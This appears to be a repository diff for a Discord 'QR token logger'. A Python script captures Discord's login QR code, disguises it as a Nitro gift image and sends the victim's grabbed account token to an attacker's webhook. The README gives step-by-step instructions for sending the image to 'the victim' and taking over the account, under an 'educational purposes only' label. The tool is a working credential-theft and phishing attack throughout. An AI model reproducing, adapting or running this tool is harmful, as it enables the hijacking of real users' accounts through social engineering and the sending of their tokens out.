Updated From NightFalls QR Token Logger

Completely Headless - No need to view Chrome Browser In creation of Token Logger
Uses webhooks to send Token to a server so it is stored and not lost!

QR_Generator.py

@@ -0,0 +1,107 @@
+from bs4 import BeautifulSoup
+from selenium import webdriver
+from PIL import Image
+import base64
+import time
+import os
+import requests
+
+#Set Webhook Here! 
+url = "WEBHOOK GOES HERE"
+
+
+# Developer: NightfallGT
+# Revised by: Luci (9P9)
+# Educational purposes only
+
+def logo_qr():
+    im1 = Image.open('temp/qr_code.png', 'r')
+    im2 = Image.open('temp/overlay.png', 'r')
+    im2_w, im2_h = im2.size
+    im1.paste(im2, (60, 55))
+    im1.save('temp/final_qr.png', quality=95)
+
+def paste_template():
+    im1 = Image.open('temp/template.png', 'r')
+    im2 = Image.open('temp/final_qr.png', 'r')
+    im1.paste(im2, (120, 409))
+    im1.save('discord_gift.png', quality=95)
+
+def main():
+    print ("[!] QR Code Token Logger Generator \n")
+
+    options = webdriver.ChromeOptions()
+    options.add_argument("--headless")
+    options.add_experimental_option('excludeSwitches', ['enable-logging'])
+    options.add_experimental_option('detach', True)
+    driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe')
+
+    print('[?] Awaiting Page to Load!')
+    driver.get('https://discord.com/login')
+    time.sleep(5)
+    print('[*] Page loaded.')
+
+    page_source = driver.page_source
+
+    soup = BeautifulSoup(page_source, features='lxml')
+
+    div = soup.find('div', {'class': 'qrCode-wG6ZgU'})
+    qr_code = div.find('img')['src']
+    file = os.path.join(os.getcwd(), 'temp/qr_code.png')
+
+    img_data =  base64.b64decode(qr_code.replace('data:image/png;base64,', ''))
+
+    with open(file,'wb') as handler:
+        handler.write(img_data)
+
+    discord_login = driver.current_url
+    logo_qr()
+    paste_template()
+
+    print('[!] QR Code has been generated as discord_gift.png \n')
+    print('[?] Send the QR Code to user and scan. Waiting...')
+    
+    while True:
+        if discord_login != driver.current_url:
+            print('Grabbing token... \n')
+            token = driver.execute_script('''
+
+    var req = webpackJsonp.push([
+        [], {
+            extra_id: (e, t, r) => e.exports = r
+        },
+        [
+            ["extra_id"]
+        ]
+    ]);
+    for (let e in req.c)
+        if (req.c.hasOwnProperty(e)) {
+            let t = req.c[e].exports;
+            if (t && t.__esModule && t.default)
+                for (let e in t.default) "getToken" === e && (token = t.default.getToken())
+        }
+    return token;   
+                ''')
+            print('------------------------------------------------------------------------------------------')
+            print('Token grabbed:',token)
+            #==================================================================================================================================
+            #Token Sent To webhook
+            
+            data = {
+                "content" : f"```Token: {token} ```",
+                "username" : "Token Logger"
+            }
+            result = requests.post(url, json = data)
+            try:
+                result.raise_for_status()
+            except requests.exceptions.HTTPError as err:
+                print(err)
+            else:
+                print("Token Grabbed! Sent to Webook | code {}.".format(result.status_code))
+            #==================================================================================================================================
+            print('------------------------------------------------------------------------------------------')
+            break
+    print('Task complete.')
+
+if __name__ == '__main__':
+    main()

README.md

@@ -0,0 +1,36 @@
+# Discord-QR-Scam
+
+### About
+A Python script that automatically generates a Nitro scam QR code and grabs the Discord token when scanned. This tool demonstrates how people can trick others
+into scanning their Discord login QR Code, and gain access to their account. Use for Educational Purposes only.
+
+![img1](https://i.ibb.co/BL2Q0jz/Screenshot-527.png)
+
+## Demonstration
+![qr-code](https://user-images.githubusercontent.com/75003671/117522092-fd79ff80-afe3-11eb-938c-23dd68d5927c.gif)
+
+## Usage
+1. If you dont have python installed, download python 3.7.6
+and make sure you click on the 'ADD TO PATH' option during
+the installation.
+
+2. Install the required modules > ```pip install -r requirements.txt``` or double click `pip_install_requirements.bat`
+
+3. Type ```python QR_Generator.py``` in cmd to run or double click `run_script.bat`
+
+4. Wait for the `discord_gift.png` to be generated. Send the image to the victim and make them scan it.
+
+5. QR Code only lasts about 2 minutes. Make sure you send a fresh one to the victim and he is ready to scan.
+
+6. When the QR Code is scanned, you will automatically be logged in to their account and the script will grab the Discord token.
+
+## Troubleshoot
+Make sure your chromedriver.exe file is the same version as your current Chrome web browser version. To check your current Chrome version,
+paste `chrome://settings/help` in Google Chrome.
+
+if Chrome crashes,
+
+1. Make sure your chromedriver.exe file is the same version as your Chrome web browser version
+2. Download the latest version chromedriver.exe here: https://chromedriver.chromium.org/downloads
+3. Then replace the chromedriver.exe file in the folder.
+

[1] install_requirements.bat

@@ -0,0 +1,4 @@
+@echo off
+title [313] PIP Install Requirements
+pip install -r requirements.txt
+pause

[2] run.bat

@@ -0,0 +1,4 @@
+@echo off
+title [313] Token QR Stealer [Made by NightFall and Revised By Luci] 
+python qr_generator.py
+pause

requirements.txt

@@ -0,0 +1,5 @@
+beautifulsoup4
+selenium
+pillow
+lxml
+requests